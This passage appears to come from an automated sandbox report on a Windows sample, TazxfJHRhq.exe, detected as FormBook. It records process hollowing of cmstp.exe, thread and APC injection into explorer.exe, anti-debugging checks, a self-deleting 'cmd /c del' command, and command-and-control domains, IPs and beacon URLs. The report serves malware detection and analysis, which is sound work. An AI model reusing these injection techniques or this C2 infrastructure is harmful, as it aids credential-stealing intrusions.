          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]4_2_045FB02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]4_2_045FB02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]4_2_045FB02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]4_2_046B4015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]4_2_046B4015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E58EC mov eax, dword ptr fs:[00000030h]4_2_045E58EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]4_2_0467B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0467B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]4_2_0467B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]4_2_0467B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]4_2_0467B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]4_2_0467B8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]4_2_045E40E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]4_2_045E40E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]4_2_045E40E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]4_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046290AF mov eax, dword ptr fs:[00000030h]4_2_046290AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9080 mov eax, dword ptr fs:[00000030h]4_2_045E9080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461F0BF mov ecx, dword ptr fs:[00000030h]4_2_0461F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]4_2_0461F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]4_2_0461F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]4_2_04663884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]4_2_04663884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]4_2_0460B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]4_2_0460B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]4_2_045EB171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]4_2_045EB171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC962 mov eax, dword ptr fs:[00000030h]4_2_045EC962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]4_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]4_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]4_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]4_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov ecx, dword ptr fs:[00000030h]4_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]4_2_0461513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]4_2_0461513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]4_2_045E9100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]4_2_045E9100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]4_2_045E9100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046741E8 mov eax, dword ptr fs:[00000030h]4_2_046741E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]4_2_045EB1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]4_2_045EB1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]4_2_045EB1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046669A6 mov eax, dword ptr fs:[00000030h]4_2_046669A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]4_2_046161A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]4_2_046161A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]4_2_046A49A4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]4_2_046A49A4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]4_2_046A49A4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]4_2_046A49A4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]4_2_046651BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]4_2_046651BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]4_2_046651BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]4_2_046651BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C182 mov eax, dword ptr fs:[00000030h]4_2_0460C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A185 mov eax, dword ptr fs:[00000030h]4_2_0461A185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612990 mov eax, dword ptr fs:[00000030h]4_2_04612990
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]4_2_0469B260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]4_2_0469B260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8A62 mov eax, dword ptr fs:[00000030h]4_2_046B8A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462927A mov eax, dword ptr fs:[00000030h]4_2_0462927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]4_2_045E9240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]4_2_045E9240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]4_2_045E9240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]4_2_045E9240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04674257 mov eax, dword ptr fs:[00000030h]4_2_04674257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AEA55 mov eax, dword ptr fs:[00000030h]4_2_046AEA55
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.jcernadas.com
          Source: C:\Windows\explorer.exeDomain query: www.theholisticbirthco.com
          Source: C:\Windows\explorer.exeDomain query: www.productsoffholland.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.88.202.115 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tor-one.com
          Source: C:\Windows\explorer.exeDomain query: www.glgshopbd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.48.194 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.autotrafficbot.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.93.150.75 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.15.160.167 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.216.152.43 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.82.188.40 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.de-knutselkeet.com
          Source: C:\Windows\explorer.exeDomain query: www.markmalls.com
          Source: C:\Windows\explorer.exeNetwork Connect: 80.67.16.8 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.240.239.44 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jamessicilia.com
          Source: C:\Windows\explorer.exeDomain query: www.kinfet.com
          Source: C:\Windows\explorer.exeDomain query: www.physicalrobot.com
          Source: C:\Windows\explorer.exeDomain query: www.zhuledao.com
          Source: C:\Windows\explorer.exeDomain query: www.cgpizza.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.curiosityisthecurebook.com
          Source: C:\Windows\explorer.exeDomain query: www.usinggroovefunnels.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_73791000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Users\user\Desktop\TazxfJHRhq.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1190000Jump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.219509749.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery141Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383852 Sample: TazxfJHRhq.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 4 other signatures 2->42 10 TazxfJHRhq.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\...\i9y7dp4bi0ysdq.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 58 Contains functionality to prevent local Windows debugging 10->58 14 TazxfJHRhq.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 usinggroovefunnels.com 192.185.48.194, 49745, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.de-knutselkeet.com 188.93.150.75, 49740, 80 SIGNET-ASSignetBVNL Netherlands 17->32 34 20 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TazxfJHRhq.exe15%VirustotalBrowse
          TazxfJHRhq.exe25%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.TazxfJHRhq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.cmstp.exe.4af7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.TazxfJHRhq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.TazxfJHRhq.exe.73790000.5.unpack100%AviraHEUR/AGEN.1131513Download File
          0.2.TazxfJHRhq.exe.27a0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.cmstp.exe.6bd538.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.jcernadas.com0%VirustotalBrowse
          www.de-knutselkeet.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.zhuledao.com/evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.autotrafficbot.com/evpn/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu100%Avira URL Cloudmalware
          http://www.curiosityisthecurebook.com/evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.de-knutselkeet.com/evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN0%Avira URL Cloudsafe
          http://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.cgpizza.net/evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.physicalrobot.com/0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.tor-one.com/evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.physicalrobot.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.jcernadas.com
          		52.216.152.43
          		truetrueunknown
          www.de-knutselkeet.com
          		188.93.150.75
          		truetrueunknown
          www.markmalls.com
          		35.240.239.44
          		truefalse
            		unknown
            curiosityisthecurebook.com
            		34.102.136.180
            		truefalse
              		unknown
              usinggroovefunnels.com
              		192.185.48.194
              		truetrue
                		unknown
                www.jamessicilia.com
                		208.91.197.91
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
